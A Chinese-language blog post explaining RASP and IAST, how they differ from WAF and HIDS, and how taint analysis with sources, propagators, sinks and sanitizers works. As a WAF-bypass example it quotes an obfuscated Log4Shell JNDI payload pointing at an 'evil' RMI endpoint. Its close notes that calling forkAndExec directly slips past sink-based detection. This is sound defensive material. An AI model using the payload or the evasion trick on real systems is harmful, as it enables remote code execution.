杂谈RASP

简单记录一下最近几个月来的调研和学习。

RASP与IAST

RASP和IAST同样都应用了插桩技术，但是两者的侧重点不太一样。

RASP，运行时应用自我保护，我认为其是在WAF和HIDS之间的一个定位。

相比于WAF是作用于流量请求的拦截，不会考虑程序内部数据流，RASP技术则是根据请求上下文进行拦截的，误报率(比如程序内部已经消毒，不存在威胁)这块应该会低一些，也不会出现像WAF被绕过(${${123:-j}${456:-n}di:rmi://127.0.0.1:1099/evil})这类的漏报。
而HIDS作为安全的最后一道防线，大部分是基于进程进行监控，打个比方说检测命令执行，Agent端把所有服务器信息，文件操作行为、网络连接、执行命令等等采集交给Server端，然后Server端基于规则进行匹配，再实时预警，但是进程监控能检测到，就代表在Web上已经被攻陷，所以HIDS的侧重点并不在Web程序上。

再说说IAST（Interactive Application Security Testing）交互式应用安全测试，IAST通常是作为上线前的测试环境使用，在模拟黑客外部攻击的同时，对内部实时数据进行监视，提高测试精度，目前IAST主要分主动插桩(百度开源的openrasp-iast)和被动插桩(洞态IAST)两种模式，之前接触过洞态IAST，所以简单介绍一下被动式。

因为是适用于测试环境，所以IAST对性能损耗要求不是那么高，IAST的I指的是Interactive——>交互，所以相比于RASP，IAST需要对上下文及输入输出更加敏感一些。

洞态对IAST规则划分了Http、Source、Propagator、Sink四个类别：

Http:通过劫持Http(不同框架处理Http请求可能不一样)，我们可以获取到原始的Servlet请求，相当于把Servlet数据进行了克隆，需要的时候再取出来。
后部分完全可以用污点分析的角度来处理：

污点分析可以抽象成一个三元组〈sources,sinks,sanitizers〉的形式,其中,source 即污点源,代表直接引入不受信任的数据或者机密数据到系统中;sink 即污点汇聚点,代表直接产生安全敏感操作(违反数据完整性)或者泄露隐私数据到外界(违反数据保密性);sanitizer 即无害处理,代表通过数据加密或者移除危害操作等手段使数据传播不再对软件系统的信息安全产生危害.污点分析就是分析程序中由污点源引入的数据是否能够不经无害处理,而直接传播到污点汇聚点.如果不能,说明系统是信息流安全的;否则,说明系统产生了隐私数据泄露或危险数据操作等安全问题.

实现Source埋点需要我们劫持所有用户可控的输入源，比如 getParameter、getHeader等函数，并对返回的值进行跟踪，一般认为所有用户可控的值都是有害的。

对于Sink的选择，其实和RASP大同小异，找到危险操作最后的触发点进行埋点即可。

最后也是最重要的部分，就是Propagator(污点传播)，按照白盒的理论，我们需要处理所有调用链中的输入和输出，判断是否可达，其中需要考虑sanitizers(消毒处理)，我们认为所有经过有效消毒之后的变量是无害的。在CODEQL中，定义了source和sink之后的 Path queries才是最重要的。IAST中如果传播点选择的覆盖率越广，传播的链路也就越清晰，但随之的问题就是堆栈太大。

但RASP和IAST也不是百分之百的捕获率，每个节点的传播都是一环扣一环。拿命令执行的例子来说，对于java.lang.Runtime.getRuntime().exec()，洞态可以很好的检测到命令执行，但是更往底层一点的UNIXProcess().forkAndExec()，因为Sink点并选取，导致无法检测。